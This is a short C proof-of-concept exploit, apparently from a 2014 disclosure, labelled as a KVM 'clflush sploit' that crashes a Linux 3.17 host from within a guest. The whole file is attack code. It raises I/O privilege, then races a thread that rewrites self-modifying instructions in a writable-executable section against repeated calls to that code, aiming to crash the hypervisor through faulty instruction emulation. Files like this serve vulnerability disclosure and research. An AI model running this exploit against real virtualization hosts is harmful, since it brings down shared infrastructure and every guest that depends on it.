// KVM clflush sploit (crashes a Linux 3.17 host)
// Copyright (c) 2014 Andy Lutomirski

#include <pthread.h>
#include <err.h>
#include <stdio.h>
#include <stdint.h>
#include <signal.h>
#include <setjmp.h>
#include <string.h>
#include <stdbool.h>
#include <sys/io.h>

asm (".pushsection .wtext, \"awx\"\n"
     "badcode:\n\t"
     "clflush (%rip)\n\t"
     "ret\n"
     ".popsection");

extern volatile unsigned short badcode[];

static void *proc(void *ignored)
{
	while (true)
		badcode[0] = 0xae0f;
	return NULL;
}

int main()
{
	if (iopl(3) != 0)
		err(1, "iopl");

	pthread_t pth;
	pthread_create(&pth, NULL, proc, NULL);

	while (true) {
		badcode[0] = 0x00e4;
		asm volatile ("call badcode" : : : "ax", "flags");
	}
}